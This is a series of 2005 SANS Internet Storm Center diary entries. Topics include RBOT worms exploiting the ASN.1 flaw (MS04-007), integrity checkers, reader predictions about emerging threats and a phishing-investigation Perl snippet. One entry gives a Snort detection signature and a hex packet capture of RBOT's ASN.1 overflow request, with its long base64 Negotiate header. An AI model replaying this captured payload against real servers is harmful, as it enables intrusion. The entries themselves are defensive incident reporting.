ASN.1 vuln, Windows integrity checker

More reports of RBOT using ASN.1 vuln

We are getting more and more reports of the use of the ASN.1 vuln in an rbot variant. This is using one of the ASN.1 vulns patched by MS04-007. The exploit is borrowed from an existing proof of concept. For more discussion see this article on the vuln-

(thanks Dave)

This was previously mentioned in the diary on the 3rd of June as possibly rbot attacking IIS' authentication methods

This is the report from VirusTotal for the samples we've seen:

Antivirus Version Update Result
AntiVir 06.05.2005 no virus found
AVG 718 06.04.2005 no virus found
Avira 06.05.2005 no virus found
BitDefender 7.0 06.05.2005 Backdoor.SDBot.0B1CDAF0
ClamAV devel-20050501 06.05.2005 no virus found
DrWeb 4.32b 06.05.2005 no virus found
eTrust-Iris 06.05.2005 Win32/RBot.121504!Worm
eTrust-Vet 06.03.2005 no virus found
Fortinet 06.04.2005 suspicious
Ikarus 2.32 06.03.2005 IM-Worm.Win32.Sumom.C
Kaspersky 06.06.2005 Backdoor.Win32.Rbot.gen
McAfee 4506 06.03.2005 no virus found
NOD32v2 1.1129 06.05.2005 Win32/Rbot
Norman 5.70.10 06.04.2005 W32/MEWpacked.gen
Panda 8.02.00 06.05.2005 W32/Gaobot.HEG.worm
Sybari 7.5.1314 06.06.2005 Worm.RBot.BGM
Symantec 8.0 06.05.2005 W32.Spybot.Worm
TheHacker 5.8-3.0 06.06.2005 no virus found
VBA32 3.10.3 06.05.2005 Backdoor.Win32.Rbot.gen

Windows Integrity tracking

Having just suffered from a violent system crash, I'm in the perfect place to start tracking everything that is done to my system. My concern is that recently I ended up having to do multiple rebuilds not because I knew my system was compromised but because I couldn't be confident that it wasn't. After running all the rootkit detection tools, AV tools, spyware/adware tools, forensic tools, etc.. that I could find, I still didn't have complete confidence.

So with my nice clean build, I'm setting a goal of having complete tracking of the state of the system. I want to know anything that executes and anything it calls and when anything of that sort changes. I started by looking around for integrity tools and trying to choose one that would make it easy to track all this (cause I'm going to get a lot of noise, I realize that).

Before you ask, yes, I've hardened the build. Yes, I use tools like InControl, the application control built into my personal firewall, WinInterrogator, WinAudit, BHO Demon, AdAware, Spybot S&D, two different AV products, Rootkit Revealer, everything Sysinternals makes, and those are just the ones that come to mind without trying. I've tried everything I can find to track this sort of stuff. None of them give me the level of visibility and assurance I want & need. So, I've been brought to this.

At the moment, the ones I'm trying are Xintegrity Professional and Osiris. Xintegrity offers a free trial and has a clean interface. It seems to crash on occasion but I'm putting up with that for now. Osiris is free and (as far as I know) only offers a command-line interface but that's fine). I've started by building a baseline of the entire system. As I add new software, I'll update the baseline to include the freshly installed software. I'm in the process of identifying the files that are going to change (legitimately) frequently. Once I have those, I'll likely remove most of them from the checks.

Why would I do this? Why not trust my AV software, my personal firewall, my anti-spyware tools, my bootable forensics distro, and everything else? Simply because none of them offer the simple confidence that I want- that I know everything that is going to execute on my system, be it BHO, DLL, EXE, firefox extension, and I want to know when any of them or any of their configurations change. I don't trust my OS, I don't trust any of the software running on it (if the recent months have shown us anything, it is that Firefox has at least as many vulnerabilities showing up as it gains popularity, as IE does), and our tools for dealing with this just seem to stink (or at least fall short of the goal by a good distance).

What do y'all do to help deal with this issue? If there is an interest, I'll post updates in the diary from time to time.

Apple Vulnerability

Finally, Apple has released patches for a whole slew of vulnerabilities:

AFP Server
CVE-ID: CAN-2005-1721
AFP Server
CVE-ID: CAN-2005-1720
CVE-ID: CAN-2005-1333
CVE-ID: CAN-2005-1722
CVE-ID: CAN-2005-1726
CVE-ID: CAN-2005-1725
CVE-ID: CAN-2005-1723
MCX Client
CVE-ID: CAN-2005-1728
CVE-ID: CAN-2005-1724
CVE-ID: CAN-2005-0524, CAN-2005-0525, CAN-2005-1042, CAN-2005-1043
CVE-ID: CAN-2005-1343

Security Update 2005-006 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:


Published: 2005-06-07

Welcome New Users; SANSFIRE; Webcast Date Change; Emerging Threats

Dear Diary,

Rather than doing one summary at the end of today, I'm going to start the diary early then update it a few times during the day.

Welcome New Users

A bunch of new readers joined us over the past few weeks and I want to thank you for stopping by. The SANS Internet Storm Center depends entirely on volunteer effort to keep it running and in the roughly six years we've been around I can say that the thousands of folks who have helped us are all greatly appreciated! Additionally, we need to express our thanks to for providing the servers, rack space, and connectivity. Whether you are a regular reader or new to the group, if you want to know more about how to participate, the are on our sister site at DShield. We can always use more sensor operators, and if you like trying your hand at incident handling then please sign up for one of our discussion lists. The port pages could also use some additional thoughts and comments if you have any to add.


is next week in Atlanta and many of us will be there. It's not too late to register if you haven't done so. If you are at the conference, please be sure to say hello and don't forget to come listen to Johannes' presentation on Monday night as he tells us all about the magic behind the curtains at the Storm Center. I'll be teaching Security 401 as well as giving a talk on Tuesday morning. Hope to see you there!

Webcast Date Change

The weekly SANS ISC
was scheduled for tomorrow. We have moved it to next week so that it follows the greatly anticipated monthly Microsoft security bulletin release. When we were setting up the webcast dates several months ago we goofed and scheduled June's webcast a week too early. Please join us next week!

Emerging Threats

As many of you know, worms, viruses, web defacements and even botnets are what we might call "last century" threats. What are we going to be facing in the coming years? The SANS ISC is interested in your ideas, so if you have time today drop us a
with your thoughts. Please don't send us a book, just a few lines will do. We'll include the best ones in the diary today.

Here's a few that have arrived:

David says, "Instead of hijacking a system to use the disk space and setup detectable FTP servers, [attackers] may end up harvesting all of the documents from the system in hopes of gaining financial or personal information for identity theft."

John suggests, "As direct electronic invoicing becomes more popular, criminals will try to leverage poor implementations of Web Services to submit fraudulent invoices for payment. Agencies that have done away with support staff necessary for manual invoice processing will pay dearly."

Greg offers, "With the developing trends in botnets and denial of service with them, I'm willing to bet that we'll see more frequent use of ddos for hire and malware distribution by zombie pcs. It also would be a shock to see an adaptive botnet..that can change and adapt to discovery on the fly..shutting down discovered nodes and such."

Steve tells us, "I believe that the real threat that's only beginning to surface is internet extortion. What means by which it will happen is hard to say, but it's an increasing threat. I think we're on the brink of seeing widespread extortion happening where files will be "kidnapped", and a ransom note will be left in their places for the user to follow if they want their precious files back." (note from the HOD - this is already happening!)

Tom thinks that these are possible emerging threats: "VoIP hacks (with social engineering and Caller ID spoofing people will give up a lot of data), Hacker "Mafias" (not just small scale people writing viruses because they can - distributed networks of hackers organizing criminal actions like stealing credit information, etc.), attacks on mobile devices (security just really is not a concern for many mobile companies)."

Alex scares us with, "My thought is that we'll see new types of Malware that are able to correlate personal data about a selected individual that it promiscuously finds on the web. The implications of this ranging from the obvious identity theft to much more sophisticated phishing scams and even password comprimise by building very specific custom dictionaries for attack. A 50k+ botnet is great for DDoS, but it has other uses for its massive computing power and connectivity; namely a huge web spidering and correlational tool for this type of attack."

Damian believes that, "one of the emerging trends could be cryptovirology. I believe it could have a huge impact if a nasty crypto worm is developed and it could exploit some new vulnerabilities. In fact I try not to think about it very often ... otherwise I couldn't sleep."

CE's crystal ball says, "Two things come to mind regarding emerging threats: 1) Infection, or at least increased attempts at infecting, of popular sites (like the recent MSN News Korea story) will increase due to the lure of large amounts of victims who trust well-known sites. 2) False information that is presented in ways that a majority of readers, and possibly many experts, wouldn't doubt. This can be used for fraud, social engineering, etc. It will move beyond phishing email and stock scams into possibly more mainstream mediums."

Gary says he is "concerned at the potential for targeted malware. Whereas today's viruses and worms are fairly indiscriminate, I forsee the emergence of malware that specifically targets a given individual, organization or some other distinctive target."

Christian muses that, "one threat will remain for ever .. that's osi layer 8. There will always be suboptimally trained users, administrators, coders or manager that copy /etc/shadow to webserver root." (note from the HOD - I like to call this the "carbon layer" of the OSI model.)

Matt predicts three major trends in the coming year: "The death spiral of signature-based virus detection ... a major increase in wireless network attacks, particularly man-in-the-middle spoofing/theft ... [and] a concentrated, coordinated effort to improve public understanding of basic security issues by both private and government agencies."

Eric is concerned about "completely 'blended' and adaptive threats funded by money that is coerced/stolen electronically. Threats that morph from one form to another depending on how a system is setup to counteract attacks is a real possibilitiy. With more 'holes' being discovered I think it is wise to believe that the development of adaptive threats with blended capabilities is going to be a huge problem."

Chip has a fatalistic outlook, telling us that, "Aside from 'individual' system administrator and 'real' security consultants, I see no cluefulness at all in the IT world, nor in oversight agencies, none." He goes on to say that, "the folks who have been wishing for a really stable platform such as BSD to host malicious applications on, have been handed a goldmine in the form of the new MacIntel platform."

Phil predicts "a worm that actually exploits a vulnerability for which we haven't had a patch for months or even years. It's been a while..."

Well, this is interesting. Most of today's submissions have been oriented on technologies. This afternoon we've seen quite a shift in the thinking of the evil minds. Here's what the mailbag brought us...

An anonymous person looked into the future connected world and prognosticated, "what about crackers breaking into an automated household and manipulating all sorts of automated devices, like the fridge, locks, dishwashers, coffemakers and so on ... another one could be break-ins to car computers to ground you or worse cause an accident on purpose ... and still another one could be (or maybe already is...) hijacking devices (such as sealing harddisks with passwords and then ask for money to reopen the disk) - you could do this with all sorts of networked equipment ... a completely different approach is identity manipulation: changing information on the web about other people to create a wrong impression about them...."

AJ steps up the heat with, "I think that the next attack could be a mobile virus that spreads between smart mobile phones. At a designated time the payload could have all the mobile phones dial a specified number DDOSing the cellular network and the target phone network."

Jim was thinking out of the box when he wrote, "Funny you haven't mentioned terrorism yet. Why blow up a building when you can destroy a nation's economy?"

Not to be outdone, Rick fired away with, "Nations or groups dedicated to the downfall of any given government could be compiling botnet lists and lists of the most effective malware for a coordinated distributed attack to undermine and collapse economic stability, maybe as part of other physical attacks."

Wayne believes that, "the newer threat will be online extortion. Download a malware, encrypt your important info, and ask for money.."

Mike was maintaining a positive outlook when he wrote, "For years, organizations have been spending a lot of money on poorly-implemented or half-baked security solutions so they can check a box on an audit finding. At the same time, auditors have been providing findings of such poor quality that the information is nearly useless to their customers. I believe some of the recent high-profile identity theft cases will bring this to light, and hopefully improve auditing practices and force the hand of large organizations to *properly* implement security technologies."

Mark is convinced that, "a cyberattack on our electronic infrastructure is in the cards." He thinks it could happen by creating a "Coordinated attack on a predetermined time and date launched from many platforms, including zombified PCs, social engineering attacks, and insiders that were 'planted' for D-Day; [or] Indirect attack from the EMP blast from a nuclear warhead on a missile. Could be launched from offshore somewhere, or even from inside the US, with the materials having been smuggled in and assembled on location; [or] Create a crisis of such proportions (some kind of attack) that the much-increased use of the electronic infrastructure because of everyone trying to contact family, friends, etc., crashes everything." (wow, Mark, you should be a screen writer!)

Several more ideas arrived later in the day. In case you are wondering, I'm putting nearly every submission in the diary since these are pretty good ideas. However, after this update we won't add any more.

Chris thinks that "identity theft is going to become more and more popular. There was a report recently about Social Security Numbers being used to covertly allow illegal immigrants to marry legit citizens, sometimes multiple times, and without the legit citizen even knowing! You can do a lot more to someone with their SSN than with their CC number!"

Ronald's theory is "massive insider access to sensitive data that is sold to criminal elements on the Internet. Someone inside somewhere right now smells the money they can get for information. And they are willing to sell it."

Michael has found that "virus and other malicious code will bypass some 'attachment blocking' through e-mail if the e-mail is digitally signed. So a virus writer could potentially use this vulnerability to bypass AVs. I could also see malicious code being encrypted in SSL on web pages, bypassing content scanning at the gateway or through proxys. Can't scan encrypted traffic..."

Florian asserts, "we will see a large increase of linux "worms" propogating via vulnerable web applications like we saw with phpBB. I think what will make them different will be that they will target multiple vulnerablities in various software packages (i.e. phpBB, awstats, etc). Im guessing they wont be depending on google anymore and do it libwhisker style (maybe a combo of both)."

Mark wouldn't be surprised "to see software deployed to turn [compromised computers] into a malicious distributed processing botnet... Think of an evil SETI@Home working to decrypt private data."

Jeff is "afraid of 'booby-trapped' malware/bots/etc. We have already seen many that attempt to disable or evade detection. What if the next generation 'detects' that you have found it or are attempting to disable it, and reformats your hard drive?"

Jeff (different Jeff) believes that "the attacks of the next century will focus on portable devices using MMS and Bluetooth as silent carriers until they are connected to a PC or wired network."

Vinicius wrote to say that, "I see current threats getting smarter. IRC bots replacing the irc protocol by private encrypted protocols, perhaps compatible with http, running on well known ports such as 80/tcp, 443/tcp, with a much less bloated communication, passing undetected by early warning systems and behavior pattern recognition. And all this being installed via web browsers [with] very recent vulnerabilities."

Finally, it looks like
took a peek at what I wanted to do today. No, I didn't know that he posted his blog yesterday on nearly the same subject. Way to go Bruce!! : )

Marcus H. Sachs

Director, SANS Internet Storm Center

Handler of the Day

Published: 2005-06-06

Windows HIDS; Port 80, IP-hopping scan;Why old exploits are still popular; A Simple Phishing Investigation Tip

Windows HIDS

Simon wrote in to ask about available Windows HIDS systems. He currently uses AIDE and Tripwire on his Linux/Solaris boxes. Personally, I don't run HIDS on windows boxes. I find that running HIDS on a system that isn't subject to any change control to be a noisy, time-consuming process. This applies to my environment, so your mileage will vary. Of course, some may consider running an instance of SNORT on each server as HIDS, and Tripwire/AIDE as file-integrity checkers. So, let's restrict our comments to windows-based open- and closed- source file-integrity checkers. What are your favorites, other than Tripwire for windows? (UPDATE: I'm getting a lot of comment on things other than file-integrity checkers. Now, I agree that the term HIDS is confusing, but I guess I wasn't clear. To reiterate: So, let's restrict our comments to windows-based open- and closed- source file-integrity checkers. :-) )

Some of the file-integrity-style HIDS suggested by the readers are:

Dragon (which has a file-integrity option) (http://www.enterasys.com/products/ids/DSHSS-xxx/) ($$)

Osirus (http://www.hostintegrity.com/osiris/) (open-source)

Samhain and Beltain can be used if you are running cygwin (http://la-samhna.de/samhain/HOWTO-samhain-on-windows.html)

Tripwire (http://ww.tripwire.com) ($$)

Harlan likes to "roll-his-own" using the Perl Win32::AdvNotify module--espeically for protecting "critical" files such as web-pages.

For more fully-featured HIDS solutions:

eEye's Blink (http://www.eeye.com/html/products/blink/index.html) ($$)

IIS Server Sensor (http://www.iss.net/products_services/enterprise_protection/rsserver/protector_server.php) ($$)

Port 80, IP-hopping scan

One of the handlers is seeing scanning port 80 hitting random IPs in his logs. Has anyone captured what they could be looking for? (i.e. from your netcats, or webserver logs.)

So far, no one has provided a correlation to But there have been plenty of reports of elevated port 80 scanning activity and based on submitted captures appear to be ANS.1 overflow attempts (MS04-007)

Why old-exploits are still popular

The media has picked up on the Win32.Gleider.AK upgrading with Fantibag and Mitgleider event. While looking at the issue what kind of threat it poses to my "day-job" I see that symantec had signatures for Gleider.AK on March 1st, 2005. Naively one wonders, "what's the big deal? We have our signatures up to day, so we're golden." In a way, that opinion holds. But the target isn't your firm's managed servers and desktops. they're looking for the old servers in closets, or cable modem connections of uninformed users (this used to be uniformed users-- but some didn't like the mental polaroid that image developed :-) -Thanks Joel.) They're looking for a system that isn't maintained, so when they get control of it, they know they'll be able to control it for a long time to come. It's not a new idea that it's a protection strategy to use an older worm to get a foothold and let it sit for a while before the attacker "puts on their best warez." The idea is that by following this cautious strategy, the bad guys keep examples of their latest stuff out of the good-guys' hands. Is that what we're seeing here with this evolution?

A Simple Phishing Investigation Tip

I was performing followup investigation on a recent phishing attempt against a financial firm. It was set-up as a series of "bait" emails, that used images linked from a compromised webserver. The "bait" email pointed the user to a a redirector website. The redirector website pointed to a single "collector" site. It was a strange set-up, or it seemed that way to me, I mean, if you control a number of servers, why not use them all as collectors? Anyway, back to the investigation phase. One of the challenges in figuring it out was my concern to not use a real browser to explore the site, and my need to get the right redirect information. Simply browsing to the redirector site in lynx returned an error page. In order to get the redirector site to play-along, I needed to look like a real browser, so I cobbled together this simple (and in some circles criminally-bad) perl script to capture the collection site:

use strict;
use LWP 5.64;
my $url = 'http://a.b.c.d/target/';
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)');
my $response = $browser->get($url);
die "Can't get $url -- ", $response->status_line unless $response->is_success;
print $response->content;

Update: my favorite flame of the evening: "The only thing worse that criminally bad perl is reinventing the wheel." Thanks Simon, who provides three options:

lynx -useragent=NAME

wget -U NAME

curl -A NAME

(reminder: I'm not Tom "follow the bouncing malware" Liston, I'm the other Liston.)


Kevin Liston

Volunteer Incident Handler

kliston that.at.thingy. isc.sans.org


Published: 2005-06-05

Sunday P & Q; Happy Birthday OpenSSH; RBOT Snort Sig; Bacula

The Peace and Quiet of a Sunday Afternoon, OpenSSH is a toddler, an RBOT Snort Signature submitted by one of our readers, and a plug for a very useful open source project...

Sunday Shifts are Great

It has been a quiet weekend so far, so here's a few things to entertain your brain:

Reading Materials--

Dogs of War: Securing Microsoft Groupware Environments with Unix (Parts 1&2)

Port Knocking: Beyond the Basics (from the SANS Reading Room, by Dawn Isabel)

Eye Candy...really some simply amazing photography-- http://gilad.deviantart.com/gallery/

Interesting Sites I Stumbled On--


Happy Birthday OpenSSH

As posted to Slashdot...OpenSSH turns 5 today. It's just a toddler, but an important tool in every security professional's bag. Cake and ice cream for everyone!!!


Useful Software Plug

I've been going through some hassles with our tape back system at work, and came upon an open source project called Bacula. It's great--has a lot in common with Amanda and Veritas. It takes a little getting used to, but it really is fantastic. It overcomes some of the shortcomings of Amanda (like being able to span volumes) and costs a lot less (as in nothing) than Veritas. I was really impressed and feel it's plug worthy.

You're all doing some kind of backups, no? ;) If not, check out Bacula. Even if you are, check out Bacula!


RBOT Snort Sig

Correction: Shirkdog submitted that he's observed RBOT triggering this existing snort signature.

WEB-MISC mod_jrun overflow attempt"; flow:to_server,established; content:"|3A|";
pcre:"/^.*\x3a[^\n]{1000}/sm"; reference:bugtraq,11245; reference:cve,2004-0646;
classtype:web-application-attack; sid:100000122; rev:1;)

[**] [1:100000122:1] COMMUNITY WEB-MISC mod_jrun overflow attempt [**]
[Classification: Web Application Attack] [Priority: 1]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0646]
[Xref => http://www.securityfocus.com/bid/11245]
Event ID: 6 Event Reference: 6
06/05/05-06:49:21.665909 -> x.x.x.x:80
TCP TTL:110 TOS:0x20 ID:64107 IpLen:20 DgmLen:1492 DF
***A**** Seq: 0x202A8FC Ack: 0x584837AA Win: 0xFF3C TcpLen: 20
47 45 54 20 2F 20 48 54 54 50 2F 31 2E 30 0D 0A GET / HTTP/1.0..
48 6F 73 74 3A 20 XX XX 2E XX XX XX 2E XX XX XX Host: XX.XXX.XXX
2E XX XX XX 0D 0A 41 75 74 68 6F 72 69 7A 61 74 .XXX..Authorizat
69 6F 6E 3A 20 4E 65 67 6F 74 69 61 74 65 20 59 ion: Negotiate Y
49 49 51 65 67 59 47 4B 77 59 42 42 51 55 43 6F IIQegYGKwYBBQUCo
49 49 51 62 6A 43 43 45 47 71 68 67 68 42 6D 49 IIQbjCCEGqhghBmI
34 49 51 59 67 4F 43 42 41 45 41 51 55 46 42 51 4IQYgOCBAEAQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQ


Dave Brookshire

SANS Handler-on-Duty


Published: 2005-06-03

Genuine TCP Port 0 activity; Osama was not caught, but some Windows users were; New RBOT variants using SQL & IIS

Genuine port 0 activity

Usually, when someone posts a message about "port 0" traffic or alerts, it is little more than an artifact of some monitoring devices inability to correctly report fragments. Not this time, and I'm still scratching my head over it.

I run several different loggers, parsers, etc. on my networks, and since I love to give the bad guys every opportunity to feel good about themselves, I throw a few honeypots in there for good measure. Better chances to succeed and give me better insight into their intentions, and all that. One of the tricks I use is to redirect everything, all unused ports, all unused addresses, etc., into a set of Perl scripts that I call Tiny Honeypot (thp). As lame as it is, the results are sometimes rather surprising. Take this one, for example:

0000000: e34c 0000 0001 105e 47e3 01cf 0e98 0d1d ãL.....^Gã.Ï....
0000010: ac6f 0055 b36f 0bd5 ba2f 5436 1204 0000 .o.U.o.Õº/T6....
0000020: 0002 0100 0107 0065 5365 7276 6572 0301 .......eServer..
0000030: 0011 3c00 0000 0301 00fb 00ef 0600 0201 ..<......û.ï....
0000040: 0055 0700 6573 6572 7665 7200 0000 0000 .U..eserver.....
0000050: 00 .

That was the payload delivered, not once, but 24 times (with slight variation) in a one hour period from seven different hosts, scattered across the globe. What's really interesting is that they were all looking for a "service" listening on port 0. Either that or they're looking for me and my silly Perl scripts. Of course I don't have a listener on port 0, but thp uses the netfilter "REDIRECT" target to DNAT everything, including traffic to absurd ports, to the location of the thp responders.

Why port 0? A couple of possibilities:

1. Broken tool - all too often I've beat my head against the wall trying to figger out why I see wierd traffic and it turns out to be a "misfire"

2. Probe - Looking for hosts, routers, firewalls, etc. The prober doesn't care about a tcp service's response, often it is the ICMP (or other) messages that are most valuable.

3. Looking for a broken service - Maybe, just maybe, there is a legitimate service, with an undisclodes vuln, that accidentally listens on port 0 as well as its intended port. I'm leaning towards this, because of the payload that was delivered AFTER a successful three-way-handshake. Hmmmmm.

I'm going to hold off for a bit on posting the source addresses, until I can get a response from their admins. Although it happened a few days ago, I haven't been able to locate any other similar activity on any of the networks I monitor.

While a few attack tools will use "0" as the src port, by default, this was directed to destination port 0. Do me a favor, If anyone has seen legitimate tcp dest port 0 activity, could you please send us as much detail as possible? I saw it in the wee hours of June 1.

Osama is still at large, and delivering malware to a PC near you

As I'm certain many of you have seen or read by now, attackers actually prey on users's curiosity and gullibility. No, really, they do! The recent "Osama Bin Laden has been captured" emails direct the recipients to....you guessed it, open a zip file containing a downloader. This beastie then pulls down what Norton calls "Backdoor.Nibu.D", a keylogger/bank info scarfer/clipboard sniffer/all-around bad guy.

Update A/V, don't open email attachments you aren't expecting, don't believe everything you read, get plenty of sleep, floss. If you absolutely, positively must see what this thing looks like, .

RBOT varients getting even MORE talented

Thanks to Robert Tabin for alerting us to new RBOT propagation methods - now they incorporate a MSSQL buffer overflow (MS02-061) exploit in the growing cocktail. See
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FRBOT%2EBJF and http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FRBOT%2EBJI

